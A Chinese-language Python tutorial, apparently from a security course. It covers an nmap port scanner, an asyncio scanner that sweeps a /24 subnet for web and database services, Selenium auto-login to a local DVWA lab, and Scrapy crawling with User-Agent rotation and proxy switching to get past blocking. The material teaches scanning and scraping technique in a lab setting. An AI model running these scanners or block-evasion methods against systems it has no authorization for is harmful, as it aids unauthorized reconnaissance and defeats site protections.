import optparse # Import the module import nmap # Import the module pr_blue = '\033[94m' pr_red = '\033[31m' pr_yellow = '\033[93m' pr_green = '\033[96m' def nmapScan(tgtHost, tgtPort): # Create the function, this fucntion does the scanning nmScan = nmap.PortScanner() nmScan.scan(tgtHost, tgtPort) state = nmScan[tgtHost]["tcp"][int(tgtPort)]["state"] protocol = nmScan[tgtHost]["tcp"][int(tgtPort)]["name"] product = nmScan[tgtHost]["tcp"][int(tgtPort)]["product"] version = nmScan[tgtHost]["tcp"][int(tgtPort)]["version"] extrainfo = nmScan[tgtHost]["tcp"][int(tgtPort)]["extrainfo"] result = "%s[*] %s%s tcp/%s %s[%s]\n%s%s %s" % ( pr_red, pr_blue, tgtHost, tgtPort, pr_green, state, pr_yellow, product, version) if extrainfo: result += "os: %s" % extrainfo print(result) def main(): # Main Program parser = optparse.OptionParser( "usage%prog " + "-H <host> -p <port>" ) # Display options/help if required parser.add_option("-H", dest="tgtHost", type="string", help="specify host") parser.add_option("-p", dest="tgtPort", type="string", help="port") (options, args) = parser.parse_args() tgtHost = options.tgtHost tgtPorts = str(options.tgtPort).split(",") if (tgtHost == None) | (tgtPorts[0] == None): print(parser.usage) exit(0) for tgtPort in tgtPorts: # Scan the hosts with the ports etc nmapScan(tgtHost, tgtPort) if __name__ == "__main__": main()
C段WEB服务扫描
Argparse
argparse 模块可以让人轻松编写用户友好的命令行接口。程序定义它需要的参数,然后 argparse 将弄清如何从 sys.argv 解析出那些参数。 argparse 模块还会自动生成帮助和使用手册,并在用户给程序传入无效参数时报出错误信息。
# 载入模块 import argparse # 初始化 parser = argparse.ArgumentParser() # 设置命令行参数 parser.add_argument("echo", action="store_true", help="echo the string you use here") # 参数解析 args = parser.parse_args() # 获取参数 print(args.echo)
执行结果
> python argparse_test.py -h
usage: test.py [-h]
positional arguments:
echo echo the string you use here
optional arguments:
-h, --help show this help message and exit
可以看到自带 -h 参数和 useage 信息
BeautifulSoup
Beautiful Soup提供一些简单的、python式的函数用来处理导航、搜索、修改分析树等功能。它是一个工具箱,通过解析文档为用户提供需要抓取的数据,因为简单,所以不需要多少代码就可以写出一个完整的应用程序。
Beautiful Soup自动将输入文档转换为Unicode编码,输出文档转换为utf-8编码。你不需要考虑编码方式,除非文档没有指定一个编码方式,这时,Beautiful Soup就不能自动识别编码方式了。然后,你仅仅需要说明一下原始编码方式就可以了。
Beautiful Soup将复杂HTML文档转换成一个复杂的树形结构,每个节点都是Python对象,所有对象可以归纳为4种:
- Tag - HTML 中的一个个标签
- NavigableString - 字符串类型
- BeautifulSoup - 表示的是一个文档的全部内容
- Comment - 注释的类型
import lxml from bs4 import BeautifulSoup html = """ <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> </head> <div class="body_padded"> <h1>Vulnerability: Brute Force</h1> <div class="vulnerable_code_area"> <h2>Login</h2> <form action="#" method="GET"> Username:<br /> <input type="text" name="username"><br /> Password:<br /> <input type="password" AUTOCOMPLETE="off" name="password"><br /> <br /> <input type="submit" value="Login" name="Login"> </form> <p>Welcome to the password protected area gordonb</p><img src="http://127.0.0.1/hackable/users/gordonb.jpg" /> </div> <h2>More Information</h2> <ul> <li><a href="https://www.owasp.org/index.php/Testing_for_Brute_Force_(OWASP-AT-004)" target="_blank">https://www.owasp.org/index.php/Testing_for_Brute_Force_(OWASP-AT-004)</a></li> <li><a href="http://www.symantec.com/connect/articles/password-crackers-ensuring-security-your-password" target="_blank">http://www.symantec.com/connect/articles/password-crackers-ensuring-security-your-password</a></li> <li><a href="http://www.sillychicken.co.nz/Security/how-to-brute-force-http-forms-in-windows.html" target="_blank">http://www.sillychicken.co.nz/Security/how-to-brute-force-http-forms-in-windows.html</a></li> </ul> </body> </html> """ soup = BeautifulSoup(html, 'lxml') # 文档对象 # 查找a标签,只会查找出一个a标签 # print(soup.a)#<a class="sister" href="http://example.com/elsie" id="xiaodeng"><!--Elsie --></a> for k in soup.find_all('a'): print(k['href']) # 查a标签的href值 print(k.string) # 查a标签的string
获取tag
print(soup.title) print(soup.head) print(soup.a) print(soup.p) print(type(soup.a))
asyncio — 异步 I/O
asyncio 是用来编写 并发 代码的库,使用 async/await 语法。
asyncio 被用作多个提供高性能 Python 异步框架的基础,包括网络和网站服务,数据库连接库,分布式任务队列等等。
示例一
import asyncio import time async def say_after(delay, what): await asyncio.sleep(delay) print(what) async def main(): print(f"started at {time.strftime('%X')}") await say_after(1, 'hello') await say_after(2, 'world') print(f"finished at {time.strftime('%X')}") asyncio.run(main())
输出:3秒完成
started at 16:03:40 hello world finished at 16:03:43
示例二
import asyncio import time async def say_after(delay, what): await asyncio.sleep(delay) print(what) async def main(): task1 = asyncio.create_task( say_after(1, 'hello')) task2 = asyncio.create_task( say_after(2, 'world')) print(f"started at {time.strftime('%X')}") # Wait until both tasks are completed (should take # around 2 seconds.) await task1 await task2 print(f"finished at {time.strftime('%X')}") asyncio.run(main())
输出:2秒完成
started at 16:08:21 hello world finished at 16:08:23
什么是协程?
协程在等待IO的过程中重复利用线程,也就是说协程本质是通过多路复用来完成的。
协程能保留上一次调用时的状态(即所有局部状态的一个特定组合),每次过程重入时,就相当于进入上一次调用的状态,换种说法:进入上一次离开时所处逻辑流的位置。
C段扫描程序
import asyncio import sys import requests from netaddr import IPNetwork from bs4 import BeautifulSoup Ports_web = [80, 88, 443, 7001, 8000, 8008, 8888, 8080, 8088, 8089, 8161, 9090] Ports_other = [21, 22, 445, 1100, 1433, 1434, 1521, 3306, 3389, 6379, 8009, 9200,11211, 27017, 50070] COUNT = 0 TIMEOUT_HTTP = 5 TIMEOUT_SOCK = 0.9 PATH = '' user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko)" \ " Chrome/101.0.4951.41 Safari/537.36" # 输出字符时的各种颜色前缀 pr_purp = '\033[95m' pr_blue = '\033[94m' pr_red = '\033[31m' pr_yellow = '\033[93m' pr_green = '\033[96m' # 结束颜色 pr_end = '\033[0m' def tag(info): return "[" + info + "]" def get_info(url, keyword): try: r = requests.get(url, headers={'UserAgent': user_agent}, timeout=TIMEOUT_HTTP, verify=False, allow_redirects=True) # 解析html soup = BeautifulSoup(r.content, "lxml") # HTTP头信息分析 info_code = tag(pr_red + str(r.status_code) + pr_end) info_title = tag(pr_blue + soup.title.string.replace('\n', '').replace('\r', '').replace( '\t', '') + pr_end) if soup.title else tag("") info_len = tag(pr_purp + str(len(r.content)) + pr_end) # 获取请求头中的服务器信息 if 'Server' in r.headers: info_server = " [" + pr_yellow + r.headers['Server'] info_server += " " + r.headers['X-Powered-By'] + pr_end + "]" if 'X-Powered-By' in r.headers else "]" else: info_server = tag("") result = info_code + info_title + info_server + info_len # HTTP内容,关键字匹配 key = tag(pr_red + "Keyword!!!" + pr_end) if keyword and keyword in r.text else "" return result + key except Exception as e: # print(e) return tag(pr_green + "open" + pr_end) async def connet(host, sem, keyword): """ 先用异步网络请求判断端口是否存在,如果存在,再对web端口进行信息输出 :param host thread keyword ip :param sem: 设置进程 :param keyword: 对web内容关键字匹配 :param ip: 获取目标host的IP :return info """ global COUNT async with sem: for port in Ports_web: fut = asyncio.open_connection(host=host, port=port) try: reader, writer = await asyncio.wait_for(fut, timeout=TIMEOUT_SOCK) if writer: # 如果没有 443/8443 端口,则使用http协议,否则使用https协议 protocol = "http" if int(port) not in [443, 8443] else "https" url = "{0}://{1}:{2}{3}".format(protocol, host, port, PATH) info = get_info(url, keyword) sys.stdout.write("%s %s\n" % (url, info)) COUNT += 1 except Exception as e: # print(e) pass async def scan(): # 用于并发控制的信号量 sem = asyncio.Semaphore(60) keyword = "" # 扫描时的关键字 c_ip = "192.168.0.1/24" # C段IP转换为单个IP的list ips = [str(ip) for ip in IPNetwork(c_ip)] tasks = [] for host in ips: tasks.append(asyncio.create_task(connet(host, sem, keyword))) await asyncio.wait(tasks) if __name__ == '__main__': asyncio.run(scan())
python 爬虫技术实现
主要内容:
- 爬虫基础简介
- requests 模块高级操作
- requests 模块
- 高性能异步爬虫
- 数据解析
- selenium 模块应用
- 验证码识别
- scrapy 框架
selenium 开发爬虫
Selenium Python 绑定提供了方便的 API 来访问 Selenium WebDrivers,如 Firefox、Ie、Chrome、Remote等。当前支持的 Python 版本为 2.7、3.5 及更高版本。
- 开源和可移植 ——Selenium 是一个开源和可移植的 Web 测试框架。
- 工具和 DSL 的结合——Selenium 是工具和 DSL(领域特定语言)的结合,以进行各种类型的测试。
- 更容易理解和实现 ——Selenium 命令按照不同的类进行分类,这使得它更容易理解和实现。
- 减少测试执行时间 ——Selenium 支持并行测试执行,从而减少执行并行测试所花费的时间。
- 所需资源 更少——与 UFT、RFT 等竞争对手相比,Selenium 需要更少的资源。
- 支持多种操作系统 ——Android、iOS、Windows、Linux、Mac、Solaris。
- 支持多种浏览器 - Google Chrome、Mozilla Firefox、Internet Explorer、Edge、Opera、Safari 等。
- 并行测试执行 ——它还支持并行测试执行,从而减少时间并提高测试效率。
安装selenium
安装Python3.x: https://www.python.org/downloads/
Linux & Mac
pip install selenium
Windows
从开始菜单点击运行(或者 Windows+R )输入 cmd ,然后执行下列命令安装:
C:\Python35\Scripts\pip.exe install selenium
现在你可以使用Python运行测试脚本了。 例如:如果你创建了一个selenium的基本示例并且保存在了C:my_selenium_script.py ,你可以如下执行:
C:\Python35\python.exe C:\my_selenium_script.py
安装网络驱动程序
可以安装 Firefox、Chromium、PhantomJs(现已弃用)等。
要使用 Firefox,您可能需要安装 GeckoDriver 下载地址https://github.com/mozilla/geckodriver/releases
安装好之后,将可执行程序加入环境变量
selenium 开发
先看一个Demo,通过Demo了解一下selenium的基本用法;
效果:通过selenium自动登录DVWA靶机系统
- 首先开启DVWA
docker start dvwa
查看DVWA登录页面前端代码,我们的目标是实现自动登录,那么首先就需要获取到登录的输入框,通过查看页面源代码发现,输入框分别为两个input 标签,一个 name="username" ,另一个 name="password"
<form action="login.php" method="post"> <fieldset> <label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br /> <label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br /> <br /> <p class="submit"><input type="submit" value="Login" name="Login"></p> </fieldset> <input type='hidden' name='user_token' value='e5613bb5b3a6f6dcb472f690239ccd4b' /> </form>
- 通过上一步确定了具体的标签后,我们需要有以下三步动作来实现自动登录;
- 通过程序定位标签;
- 输入账号密码;
- 点击登录;
- 通过程序定位标签;
通过以上逻辑,确定自动化登录代码
from selenium import webdriver from selenium.webdriver.common.by import By print("Start Cici Selenium Test Project....") # 设置User-Agent profile = webdriver.FirefoxOptions() profile.set_preference("general.useragent.override", "Cici.com") # 使用火狐浏览器环境 driver = webdriver.Firefox(options=profile) # 设置访问的地址 driver.get("http://localhost:8080") # 使用XPATH方式获取html标签节点,此处为获取 input 标签中名称为 username 的节点 user_elem = driver.find_element(By.XPATH, "//input[@name='username']") # 获取input标签,名称为password的节点 pass_elem = driver.find_element(By.XPATH, "//input[@name='password']") # 清空节点默认值 user_elem.clear() # 清空节点默认值 pass_elem.clear() # 设置username标签节点内容为 admin user_elem.send_keys("admin") # 设置password标签节点内容为 password pass_elem.send_keys("password") # 获取登陆按钮节点 login_butten_elem = driver.find_element(By.XPATH, "//input[@Name='Login']") # 点击登陆按钮 login_butten_elem.click() # 打印User-Agent print(driver.execute_script("return navigator.userAgent")) # 关闭浏览器环境 driver.close()
使用cookie直接登录
import time from selenium import webdriver print("Start Cici Selenium Test Project By Use Cookie....") # 使用火狐浏览器环境 driver = webdriver.Firefox() # 设置访问的地址 # 添加Cookie driver.get("http://127.0.0.1:8080") driver.add_cookie({ 'name': 'PHPSESSID', 'value': 'qq53p7m5ppq5t6a6gmbede2f27' }) time.sleep(1) driver.get("http://127.0.0.1:8080/index.php") # 关闭浏览器环境 # driver.close()
selenium 各方法含义
方法 描述 add_cookie 将 cookie 添加到当前会话。 back 在浏览器历史中倒退了一步。 close 关闭当前窗口。 create_web_element 创建具有指定 element_id 的 Web 元素。 delete_all_cookies 删除会话范围内的所有 cookie。 delete_cookie 删除具有给定名称的单个 cookie。 get_cookie 按名称获取单个 cookie。 如果找到则返回 cookie,如果没有则返回 None。 get_cookies 返回一组字典,对应于当前会话中可见的 cookie。 quite 退出驱动程序并关闭每个关联的窗口。 refersh 刷新当前页面。 set_page_load_timeout 设置在引发错误之前等待页面加载完成的时间量。 set_script_timeout 设置脚本在 execute_async_script 调用期间在引发错误之前应等待的时间量。 current_url 获取当前页面的 URL。 page_source 获取当前页面的源代码。 title 返回当前页面的标题。退出驱动程序并关闭每个关联的窗口。 refersh 刷新当前页面。 set_page_load_timeout 设置在引发错误之前等待页面加载完成的时间量。 set_script_timeout 设置脚本在 execute_async_script 调用期间在引发错误之前应等待的时间量。 execute_script 执行 js 脚本
爬取Key网站及链接
代理IP获取网站
https://free.kuaidaili.com/free/inha/
from selenium import webdriver from selenium.webdriver.common.by import By import re print("Start Cici Selenium Test Project....") # 设置代理 profile = webdriver.FirefoxOptions() profile.set_preference("network.proxy.type", 1) profile.set_preference("network.proxy.socks", "202.55.5.209") profile.set_preference("network.proxy.socks_port", 8090) # 使用火狐浏览器环境 driver = webdriver.Firefox(options=profile) # 设置访问的地址 driver.get("https://www.Cici.com") # 获取所有课程列表 Cici_reults = driver.find_elements(By.XPATH, "//section[@id='modules-28']") for result in Cici_reults: h3_results = result.find_elements(By.CLASS_NAME, 'service-item-title') for name in h3_results: print(name.text) # 获取页面中存在的链接 # 获取a标签 Cici_link = driver.find_elements(By.XPATH, '//a') for data in Cici_link: # 获取href属性 link = data.get_attribute('href') # 匹配域名为Cici.com if re.match("https://[a-z]*.Cici.com", link): print(link) # 关闭浏览器环境 driver.close()
作业:
- 爬取Key网站时,对所有爬取到的主页的链接进行去重;
- 当主页中链接为html页面时进行进一步爬取(获得html页面中的所有Cici域名的链接);
- 输出去重后的所有链接并统计数量;
- 爬取代理IP列表,当网站访问被拦截时自动替换代理IP(进阶,选做);
scrapy框架
Scrapy是用Python实现的一个为了爬取网站数据,提取结构性数据而编写的应用框架。 可以应用在包括数据挖掘、信息处理或存储历史数据等一系列的程序中。
Scrapy使用Twisted基于事件的高效异步网络框架来处理网络通信,可以加快下载速度,不用自己去实现异步框架,并且包含了各种中间件接口,可以灵活的完成各种需求。
Scrapy架构
- Scrapy Engine
引擎,负责控制数据流在系统中所有组件中流动,并在相应动作发生时触发事件。 此组件相当于爬虫的“大脑”,是整个爬虫的调度中心。 - 调度器(Scheduler)
调度器接收从引擎发送过来的request,并将他们入队,以便之后引擎请求他们时提供给引擎。
初始的爬取URL和后续在页面中获取的待爬取的URL将放入调度器中,等待爬取。同时调度器会自动 去除重复的URL (如果特定的URL不需要去重也可以通过设置实现,如post请求的URL) - 下载器(Downloader)
下载器负责获取页面数据并提供给引擎,而后提供给spider。 - Spiders爬虫
Spider是编写的类,作用如下:
- Scrapy用户编写用于分析response并提取item(即获取到的item)
- 额外跟进的URL,将额外跟进的URL提交给引擎,加入到Scheduler调度器中。将每个spider负责处理一个特定(或一些)网站。
- Scrapy用户编写用于分析response并提取item(即获取到的item)
- Item Pipeline
Item Pipeline负责处理被spider提取出来的item。典型的处理有清理、 验证及持久化(例如存取到数据库中)。
当页面被爬虫解析所需的数据存入Item后,将被发送到项目管道(Pipeline),并经过设置好次序的pipeline程序处理这些数据,最后将存入本地文件或存入数据库。
类似管道$ ls | grep test
。
以下是item pipeline的一些典型应用:
- 清理HTML数据
- 验证爬取的数据(检查item包含某些字段)
- 查重(或丢弃)
- 将爬取结果保存到数据库中
- 清理HTML数据
- 下载器中间件(Downloader middlewares)
简单讲就是自定义扩展下载功能的组件
下载器中间件,是在引擎和下载器之间的特定钩子(specific hook),处理它们之间的请求request和响应response。 它提供了一个简便的机制,通过插入自定义代码来扩展Scrapy功能。
通过设置下载器中间件可以实现爬虫自动更换user-agent、IP等功能。 - Spider中间件(Spider middlewares)
Spider中间件,是在引擎和Spider之间的特定钩子(specific hook),处理spider的输入(response)和输出(items或requests)。 也提供了同样的简便机制,通过插入自定义代码来扩展Scrapy功能。
数据流(Data flow)
- 引擎打开一个网站(open a domain),找到处理该网站的Spider并向该spider请求第一个(批)要爬取的URL(s)
- 引擎从Spider中获取到第一个要爬取的URL并加入到调度器(Scheduler)作为请求以备调度
- 引擎向调度器请求下一个要爬取的URL
- 调度器返回下一个要爬取的URL给引擎,引擎将URL通过下载中间件并转发给下载器(Downloader)
- 一旦页面下载完毕,下载器生成一个该页面的Response,并将其通过下载中间件发送给引擎
- 引擎从下载器中接收到Response,然后通过Spider中间件发送给Spider处理
- Spider处理Response并返回提取到的Item及(跟进的)新的Request给引擎
- 引擎将Spider返回的Item交给Item Pipeline,将Spider返回的Request交给调度器
- (从第二步)重复执行,直到调度器中没有待处理的request,引擎关闭
注意:只有当调度器中没有任何request了,整个程序才会停止执行。如果有下载失败的URL,会重新下载
安装scrapy
安装wheel支持 $ pip install wheel 安装scrapy框架 $ pip install scrapy window下,为了避免windows编译安装twisted依赖,安装下面的二进制包 $ pip install Twisted-18.4.0-cp35-cp35m-win_amd64.whl
windows下出现如下问题 copying src\twisted\words\xish\xpathparser.g -> build\lib.win-amd64- 3.5\twisted\words\xish running build_ext building 'twisted.test.raiser' extension error: Microsoft Visual C++ 14.0 is required. Get it with "Microsoft Visual C++ Build Tools": http://landinghub.visualstudio.com/visual-cpp-build-tools 解决方案是,下载编译好的twisted,https://www.lfd.uci.edu/~gohlke/pythonlibs/#twisted python3.5 下载 Twisted-18.4.0-cp35-cp35m-win_amd64.whl python3.6 下载 Twisted-18.4.0-cp36-cp36m-win_amd64.whl 安装twisted $ pip install Twisted-18.4.0-cp35-cp35m-win_amd64.whl 之后在安装scrapy就没有什么问题了
安装好,使用scrapy命令看看
> scrapy
Scrapy 1.5.0 - no active project
Usage:
scrapy <command> [options] [args]
Available commands:
bench Run quick benchmark test
check Check spider contracts
crawl Run a spider
edit Edit spider
fetch Fetch a URL using the Scrapy downloader
genspider Generate new spider using pre-defined templates
list List available spiders
parse Parse URL (using its spider) and print the results
runspider Run a self-contained spider (without creating a project)
settings Get settings values
shell Interactive scraping console
startproject Create new project
version Print Scrapy version
view Open URL in browser, as seen by Scrapy
一个简单的爬虫示例
创建爬虫
mkdir scrapy_dir
cd scrapy_dir
scrapy startproject Cici
在spiders目录下创建CiciSpider.py并写入代码
import scrapy class CiciSpider(scrapy.Spider): name = "Cici" def start_requests(self): urls = [ 'https://quotes.toscrape.com/page/1/', 'https://quotes.toscrape.com/page/2/', ] for url in urls: yield scrapy.Request(url=url, callback=self.parse) def parse(self, response): page = response.url.split("/")[-2] filename = f'quotes-{page}.html' with open(filename, 'wb') as f: f.write(response.body) self.log(f'Saved file {filename}')
还可以定义一个 start_urls 变量,内容为url列表,此时会默认使用此列表调用 start_requests 方法;
parse为默认回调方法,即使不指定也会自动回调。
import scrapy class CiciSpider(scrapy.Spider): name = "Cici" start_urls = [ 'https://quotes.toscrape.com/page/1/', 'https://quotes.toscrape.com/page/2/', ] def parse(self, response): page = response.url.split("/")[-2] filename = f'quotes-{page}.html' with open(filename, 'wb') as f: f.write(response.body) self.log(f'Saved file {filename}')
- name : 标识爬虫。 肯定是 在一个项目中是唯一的,即不能为不同的名称设置相同的爬虫名称。
- start_requests() :必须返回一个可迭代的请求。
- parse() : 将被调用来处理的方法为每个请求下载的响应。 响应参数 是一个实例 TextResponse 持有 页面内容,并有更多有用的方法来处理它。
这 parse() 方法通常解析响应,提取 将抓取的数据作为 dicts 并找到新的 URL 关注并创建新请求(Request ) 从他们。
运行爬虫
在项目根目录下运行
scrapy crawl Cici
运行之后能够看到项目根目录下有两个下载好的文件。
提取数据
使用命令
scrapy shell "https://quotes.toscrape.com/page/1/"
之后会进入一个交互式shell,可以通过各种方法操纵返回数据
>>> response.css('title') # 返回一个 Selector 对象 [<Selector xpath='descendant-or-self::title' data='<title>Quotes to Scrape</title>'>] # 获取title的内容 >>> response.css('title::text').getall() ['Quotes to Scrape'] # 不指定 ::text 会获取整个标签 >>>response.css('title').getall() ['<title>Quotes to Scrape</title>'] # 使用正则表达式匹配 >>> response.css('title::text').re(r'Quotes.*') ['Quotes to Scrape'] >>> response.css('title::text').re(r'Q\w+') ['Quotes'] >>> response.css('title::text').re(r'(\w+) to (\w+)') ['Quotes', 'Scrape']
除了 CSS ,Scrapy 选择器还支持使用 XPath 表达式:
>>> response.xpath('//title') [<Selector xpath='//title' data='<title>Quotes to Scrape</title>'>] >>> response.xpath('//title/text()').get() 'Quotes to Scrape'
获取其它标签内容
https://quotes.toscrape.com 页面代码
<div class="quote"> <span class="text">“The world as we have created it is a process of our thinking. It cannot be changed without changing our thinking.”</span> <span> by <small class="author">Albert Einstein</small> <a href="/author/Albert-Einstein">(about)</a> </span> <div class="tags"> Tags: <a class="tag" href="/tag/change/page/1/">change</a> <a class="tag" href="/tag/deep-thoughts/page/1/">deep-thoughts</a> <a class="tag" href="/tag/thinking/page/1/">thinking</a> <a class="tag" href="/tag/world/page/1/">world</a> </div> </div>
运行命令 $ scrapy shell 'https://quotes.toscrape.com'
如果要获取 <div class="quote">
中的内容,可以这样写:
>>> quote = response.css("div.quote")[0] >>> text = quote.css("span.text::text").get() >>> text '“The world as we have created it is a process of our thinking. It cannot be changed without changing our thinking.”' # 获取div标签class为tag中a标签class为tag的text >>> tags = quote.css("div.tags a.tag::text").getall() >>> tags ['change', 'deep-thoughts', 'thinking', 'world'] # 获取 a 标签的 href 属性值 >>> quote.css("div.tags a::attr(href)").getall() ['/tag/change/page/1/', '/tag/deep-thoughts/page/1/', '/tag/thinking/page/1/','/tag/world/page/1/']
在python代码中获取解析返回数据
import scrapy class CiciSpider(scrapy.Spider): name = "Cici2" def start_requests(self): urls = [ 'https://quotes.toscrape.com/page/1/', 'https://quotes.toscrape.com/page/2/', ] for url in urls: yield scrapy.Request(url=url, callback=self.parse) def parse(self, response): for quote in response.css('div.quote'): yield { 'text': quote.css('span.text::text').get(), 'author': quote.css('small.author::text').get(), 'tags': quote.css('div.tags a.tag::text').getall(), }
运行: scrapy crawl Cici2
存储数据:
- scrapy crawl Cici2 -O quotes.json json列表形式 (所有json存储在一个列表中)
- scrapy crawl Cici2 -O quotes.jl json lines 格式 (一行一条json数据)
提取下一页内容
通过HTML看到下一页的标签
<ul class="pager"> <li class="next"> <a href="/page/2/">Next <span aria-hidden="true">→</span></a> </li> </ul>
获取标签链接:
>>> response.css('li.next a::attr(href)').get() '/page/2/'
使用爬虫代码解析
import scrapy class CiciSpider(scrapy.Spider): name = "CiciSecond" start_urls = [ 'https://quotes.toscrape.com/page/1/', ] def parse(self, response): for quote in response.css('div.quote'): yield { 'text': quote.css('span.text::text').get(), 'author': quote.css('small.author::text').get(), 'tags': quote.css('div.tags a.tag::text').getall(), } # 获取下一页链接 next_page = response.css('li.next a::attr(href)').get() # 判断链接不是空 if next_page is not None: # 接收下一页返回内容 next_page = response.urljoin(next_page) # 继续调用 Scrapy 请求,并回调 parse 函数 yield scrapy.Request(next_page, callback=self.parse)
更简便的方法是使用 response.follow
import scrapy class CiciSpider(scrapy.Spider): name = "CiciSecond" start_urls = [ 'https://quotes.toscrape.com/page/1/', ] def parse(self, response): for quote in response.css('div.quote'): yield { 'text': quote.css('span.text::text').get(), 'author': quote.css('small.author::text').get(), 'tags': quote.css('div.tags a.tag::text').getall(), } # ======================================================================== next_page = response.css('li.next a::attr(href)').get() if next_page is not None: # 直接使用 response.follow 即可 yield response.follow(next_page, callback=self.parse) # 当需要获取 a 标签的 href 属性时,支持自动获取 # ======================================================================== for a in response.css('ul.pager a'): yield response.follow(a, callback=self.parse) # 进一步缩短, 使用 follow_all 方法 # ======================================================================== yield from response.follow_all(css='ul.pager a', callback=self.parse)
使用参数
scrapy crawl CiciSecond2 -O quotes-humor.json -a tag=humor
import scrapy class CiciSpider(scrapy.Spider): name = "CiciSecond2" def start_requests(self): url = 'https://quotes.toscrape.com/' tag = getattr(self, 'tag', None) if tag is not None: url = url + 'tag/' + tag yield scrapy.Request(url, self.parse) def parse(self, response): for quote in response.css('div.quote'): yield { 'text': quote.css('span.text::text').get(), 'author': quote.css('small.author::text').get(), } next_page = response.css('li.next a::attr(href)').get() if next_page is not None: yield response.follow(next_page, self.parse)
使用item
首先,在items.py 文件中定义item
# Define here the models for your scraped items # # See documentation in: # https://docs.scrapy.org/en/latest/topics/items.html import scrapy class CiciScrapyDemoItem(scrapy.Item): # 设置字段 text = scrapy.Field() author = scrapy.Field() tags = scrapy.Field() last_updated = scrapy.Field(serializer=str)
import scrapy from Cici_scrapy_demo.items import CiciScrapyDemoItem class CiciSpider(scrapy.Spider): name = "CicItemTest" start_urls = [ 'https://quotes.toscrape.com/page/1/', ] def parse(self, response): for quote in response.css('div.quote'): item = CiciScrapyDemoItem() item['text'] = quote.css('span.text::text').get() item['author'] = quote.css('small.author::text').get() item['tags'] = quote.css('div.tags a.tag::text').getall() yield item
使用 Item Pipeline
一个项目被爬虫抓取后,它被发送到 Item Pipeline 它通过按顺序执行的几个组件来处理。
每个 Item Pipeline 组件是一个 实现简单方法的 Python 类。
Item Pipeline 的典型用途是:
- 清理 HTML 数据
- 验证抓取的数据(检查项目是否包含某些字段)
- 检查重复项(并删除它们)
- 将抓取的项目存储在数据库中
在 pipelines.py 文件中写入,用来将爬取到的数据保存到 items.jl 文件中:
import json # Define your item pipelines here # # Don't forget to add your pipeline to the ITEM_PIPELINES setting # See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html # useful for handling different item types with a single interface from itemadapter import ItemAdapter class CiciScrapyDemoPipeline: # 爬虫开启时自动调用此方法 def open_spider(self, spider): self.file = open('items.jl', 'w') # 爬虫关闭时自动调用此方法 def close_spider(self, spider): self.file.close() def process_item(self, item, spider): line = json.dumps(ItemAdapter(item).asdict()) + "\n" self.file.write(line) return item
在 settings.py 文件中将以下代码注释取消:
ITEM_PIPELINES = { # pipelines 中类的名称,可以加入多个 'Cici_scrapy_demo.pipelines.CiciScrapyDemoPipeline': 300, }
使用中间件
- process_spider_input(response, spider)
- 对于通过 spider 的每个响应都会调用此方法 中间件并进入 spider,进行处理。
- process_spider_input()应该返回 None
- 如果它返回 None , Scrapy 会继续处理这个响应, 执行所有其他中间件,直到最终收到响应 交给spider处理
- process_spider_input()应该返回 None
- 对于通过 spider 的每个响应都会调用此方法 中间件并进入 spider,进行处理。
- process_spider_output(response, result, spider)
- 使用从 Spider 返回的结果调用此方法,之后 它已经处理了响应。
- 必须返回一个 result 的可迭代对象
- 必须返回一个 result 的可迭代对象
- 使用从 Spider 返回的结果调用此方法,之后 它已经处理了响应。
- process_start_requests(start_requests, spider)
- 这个方法是在spider的启动请求中调用的,必须只返回requests
- 这个方法是在spider的启动请求中调用的,必须只返回requests
示例
在middlewares.py 中写入中间件代码
import random # 自动替换UA class UAMiddleware(object): def __init__(self): self.USER_AGENT_LIST = [ "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36", "Dalvik/1.6.0 (Linux; U; Android 4.2.1; 2013022 MIUI/JHACNBL30.0)", "Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; HUAWEI MT7-TL00 Build/HuaweiMT7-TL00) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1", "AndroidDownloadManager", "Apache-HttpClient/UNAVAILABLE (java 1.4)", "Dalvik/1.6.0 (Linux; U; Android 4.3; SM-N7508V Build/JLS36C)", "Android50-AndroidPhone-8000-76-0-Statistics-wifi", "Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 3 MIUI/V7.2.1.0.KXCCNDA)", "Dalvik/1.6.0 (Linux; U; Android 4.4.2; Lenovo A3800-d Build/LenovoA3800-d)", "Lite 1.0 ( http://litesuits.com )", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0", "Mozilla/5.0 (Linux; U; Android 4.1.1; zh-cn; HTC T528t Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30; 360browser(securitypay,securityinstalled); 360(android,uppayplugin); 360 Aphone Browser (2.0.4)", ] # 使用 process_spider_input 方法 def process_spider_input(self, response, spider): ua = random.choice(self.USER_AGENT_LIST) response.request.headers['User-Agent'] = ua return None
在settings.py 中激活中间件
SPIDER_MIDDLEWARES = { 'Cici_scrapy_demo.middlewares.UAMiddleware': 544, }
在spider中输出请求的UA信息
import scrapy from Cici_scrapy_demo.items import CiciScrapyDemoItem class CiciSpider(scrapy.Spider): name = "CicItemTest" start_urls = [ 'https://quotes.toscrape.com/page/1/', ] def parse(self, response): for quote in response.css('div.quote'): .............. print(response.request.headers['User-Agent']) yield item
作业:
- 爬取代理网站 https://free.kuaidaili.com
- 使用item设置类,其中包含 IP、PORT、类型、位置、响应速度、最后验证时间
- 爬取内容写入文件,按最后验证时间倒序排列
- 设置爬虫参数:
- 设置地理位置,例如:根据参数设置位置为 香港,则只爬取香港的代理地址
- 设置响应时间,例如:设置响应时间为 0.3秒,则爬取响应速度小于等于0.3秒的代理IP地址
- 设置地理位置,例如:根据参数设置位置为 香港,则只爬取香港的代理地址